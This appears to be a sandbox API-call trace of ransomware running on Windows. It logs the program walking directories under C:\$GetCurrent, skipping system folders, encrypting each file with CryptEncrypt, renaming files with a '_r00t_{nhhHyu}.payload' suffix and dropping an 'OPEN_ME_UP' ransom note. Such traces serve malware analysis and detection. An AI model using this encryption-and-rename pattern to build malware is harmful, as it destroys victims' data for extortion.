[0058.055] ReadFile (in: hFile=0x438, lpBuffer=0x641a90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x641a90*, lpNumberOfBytesRead=0x342f7e4*=0x1774, lpOverlapped=0x0) returned 1 [0058.056] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffe88c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.056] WriteFile (in: hFile=0x438, lpBuffer=0x641a90*, nNumberOfBytesToWrite=0x1774, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x641a90*, lpNumberOfBytesWritten=0x342f7e4*=0x1774, lpOverlapped=0x0) returned 1 [0058.056] GetProcessHeap () returned 0x5e0000 [0058.056] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x641a90 | out: hHeap=0x5e0000) returned 1 [0058.056] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.056] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.056] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.057] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.057] CloseHandle (hObject=0x438) returned 1 [0058.057] GetProcessHeap () returned 0x5e0000 [0058.057] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x641a90 [0058.057] wnsprintfW (in: pszDest=0x641a90, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log_r00t_{nhhHyu}.payload") returned 78 [0058.058] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log_r00t_{nhhHyu}.payload" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log_r00t_{nhhhyu}.payload")) returned 1 [0058.058] GetProcessHeap () returned 0x5e0000 [0058.058] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x641a90 | out: hHeap=0x5e0000) returned 1 [0058.058] FindNextFileW (in: hFindFile=0x606220, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 1 [0058.058] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="Windows") returned -1 [0058.058] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="$Recycle.bin") returned 1 [0058.058] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="System Volume Information") returned -1 [0058.058] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="Program Files") returned -1 [0058.058] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="Program Files (x86)") returned -1 [0058.058] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 54 [0058.058] StrStrIW (lpFirst="PartnerSetupCompleteResult.log", lpSrch=".payload") returned 0x0 [0058.058] lstrcmpW (lpString1="PartnerSetupCompleteResult.log", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.058] lstrcmpW (lpString1="PartnerSetupCompleteResult.log", lpString2="taridd") returned -1 [0058.058] StrCmpNW (lpStr1="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.058] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.059] GetTickCount () returned 0x114ef53 [0058.059] GetTickCount () returned 0x114ef53 [0058.059] GetTickCount () returned 0x114ef53 [0058.059] GetTickCount () returned 0x114ef53 [0058.059] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.059] GetProcessHeap () returned 0x5e0000 [0058.059] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x641a90 [0058.059] ReadFile (in: hFile=0x438, lpBuffer=0x641a90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x641a90*, lpNumberOfBytesRead=0x342f7e4*=0x28, lpOverlapped=0x0) returned 1 [0058.060] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffffd8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.060] WriteFile (in: hFile=0x438, lpBuffer=0x641a90*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x641a90*, lpNumberOfBytesWritten=0x342f7e4*=0x28, lpOverlapped=0x0) returned 1 [0058.060] GetProcessHeap () returned 0x5e0000 [0058.060] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x641a90 | out: hHeap=0x5e0000) returned 1 [0058.060] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.060] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.164] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.164] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.164] CloseHandle (hObject=0x438) returned 1 [0058.167] GetProcessHeap () returned 0x5e0000 [0058.167] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x641a90 [0058.167] wnsprintfW (in: pszDest=0x641a90, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log_r00t_{nhhHyu}.payload") returned 76 [0058.167] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log_r00t_{nhhHyu}.payload" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log_r00t_{nhhhyu}.payload")) returned 1 [0058.168] GetProcessHeap () returned 0x5e0000 [0058.168] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x641a90 | out: hHeap=0x5e0000) returned 1 [0058.168] FindNextFileW (in: hFindFile=0x606220, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 0 [0058.168] FindClose (in: hFindFile=0x606220 | out: hFindFile=0x606220) returned 1 [0058.168] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\Logs\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 55 [0058.168] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\$getcurrent\\logs\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0058.169] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0058.170] CloseHandle (hObject=0x430) returned 1 [0058.170] GetProcessHeap () returned 0x5e0000 [0058.170] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0058.170] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0058.170] lstrcmpiW (lpString1="SafeOS", lpString2="Windows") returned -1 [0058.170] lstrcmpiW (lpString1="SafeOS", lpString2="$Recycle.bin") returned 1 [0058.170] lstrcmpiW (lpString1="SafeOS", lpString2="System Volume Information") returned -1 [0058.170] lstrcmpiW (lpString1="SafeOS", lpString2="Program Files") returned 1 [0058.171] lstrcmpiW (lpString1="SafeOS", lpString2="Program Files (x86)") returned 1 [0058.171] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS") returned 25 [0058.171] lstrcmpW (lpString1="SafeOS", lpString2=".") returned 1 [0058.171] lstrcmpW (lpString1="SafeOS", lpString2="..") returned 1 [0058.171] lstrcmpW (lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0058.171] GetProcessHeap () returned 0x5e0000 [0058.171] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0058.171] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\*") returned 27 [0058.171] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6066e0 [0058.174] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0058.174] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.175] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.175] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.175] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.175] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\.") returned 27 [0058.175] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.175] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0058.175] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.175] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.175] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.175] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.175] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.175] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\..") returned 28 [0058.175] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.175] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.175] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="GetCurrentOOBE.dll", cAlternateFileName="GETCUR~1.DLL")) returned 1 [0058.175] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="Windows") returned -1 [0058.175] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="$Recycle.bin") returned 1 [0058.175] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="System Volume Information") returned -1 [0058.175] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="Program Files") returned -1 [0058.175] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="Program Files (x86)") returned -1 [0058.175] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 44 [0058.175] StrStrIW (lpFirst="GetCurrentOOBE.dll", lpSrch=".payload") returned 0x0 [0058.175] lstrcmpW (lpString1="GetCurrentOOBE.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.175] lstrcmpW (lpString1="GetCurrentOOBE.dll", lpString2="taridd") returned -1 [0058.175] StrCmpNW (lpStr1="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.175] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.176] GetTickCount () returned 0x114efc0 [0058.176] GetTickCount () returned 0x114efc0 [0058.176] GetTickCount () returned 0x114efc0 [0058.177] GetTickCount () returned 0x114efc0 [0058.177] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.177] GetProcessHeap () returned 0x5e0000 [0058.177] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x641a90 [0058.177] ReadFile (in: hFile=0x438, lpBuffer=0x641a90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x641a90*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.179] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.179] WriteFile (in: hFile=0x438, lpBuffer=0x641a90*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x641a90*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.179] GetProcessHeap () returned 0x5e0000 [0058.179] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x641a90 | out: hHeap=0x5e0000) returned 1 [0058.179] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.179] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.181] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.181] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.181] CloseHandle (hObject=0x438) returned 1 [0058.185] GetProcessHeap () returned 0x5e0000 [0058.185] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x641a90 [0058.185] wnsprintfW (in: pszDest=0x641a90, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll_r00t_{nhhHyu}.payload") returned 66 [0058.185] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll_r00t_{nhhhyu}.payload")) returned 1 [0058.185] GetProcessHeap () returned 0x5e0000 [0058.185] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x641a90 | out: hHeap=0x5e0000) returned 1 [0058.185] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x9c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="GetCurrentRollback.ini", cAlternateFileName="GETCUR~1.INI")) returned 1 [0058.185] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="Windows") returned -1 [0058.185] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="$Recycle.bin") returned 1 [0058.185] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="System Volume Information") returned -1 [0058.185] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="Program Files") returned -1 [0058.185] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="Program Files (x86)") returned -1 [0058.185] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 48 [0058.185] StrStrIW (lpFirst="GetCurrentRollback.ini", lpSrch=".payload") returned 0x0 [0058.186] lstrcmpW (lpString1="GetCurrentRollback.ini", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.186] lstrcmpW (lpString1="GetCurrentRollback.ini", lpString2="taridd") returned -1 [0058.186] StrCmpNW (lpStr1="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.186] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.187] GetTickCount () returned 0x114efd0 [0058.187] GetTickCount () returned 0x114efd0 [0058.187] GetTickCount () returned 0x114efd0 [0058.187] GetTickCount () returned 0x114efd0 [0058.187] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.187] GetProcessHeap () returned 0x5e0000 [0058.187] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x641a90 [0058.187] ReadFile (in: hFile=0x438, lpBuffer=0x641a90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x641a90*, lpNumberOfBytesRead=0x342f7e4*=0x9c, lpOverlapped=0x0) returned 1 [0058.188] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffff64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.188] WriteFile (in: hFile=0x438, lpBuffer=0x641a90*, nNumberOfBytesToWrite=0x9c, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x641a90*, lpNumberOfBytesWritten=0x342f7e4*=0x9c, lpOverlapped=0x0) returned 1 [0058.189] GetProcessHeap () returned 0x5e0000 [0058.189] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x641a90 | out: hHeap=0x5e0000) returned 1 [0058.189] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.189] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.189] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.190] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.190] CloseHandle (hObject=0x438) returned 1 [0058.190] GetProcessHeap () returned 0x5e0000 [0058.190] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x641a90 [0058.190] wnsprintfW (in: pszDest=0x641a90, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini_r00t_{nhhHyu}.payload") returned 70 [0058.190] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini_r00t_{nhhHyu}.payload" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini_r00t_{nhhhyu}.payload")) returned 1 [0058.191] GetProcessHeap () returned 0x5e0000 [0058.191] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x641a90 | out: hHeap=0x5e0000) returned 1 [0058.191] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="PartnerSetupComplete.cmd", cAlternateFileName="PARTNE~1.CMD")) returned 1 [0058.191] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="Windows") returned -1 [0058.191] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="$Recycle.bin") returned 1 [0058.191] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="System Volume Information") returned -1 [0058.191] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="Program Files") returned -1 [0058.191] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="Program Files (x86)") returned -1 [0058.191] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 50 [0058.191] StrStrIW (lpFirst="PartnerSetupComplete.cmd", lpSrch=".payload") returned 0x0 [0058.191] lstrcmpW (lpString1="PartnerSetupComplete.cmd", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.191] lstrcmpW (lpString1="PartnerSetupComplete.cmd", lpString2="taridd") returned -1 [0058.191] StrCmpNW (lpStr1="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 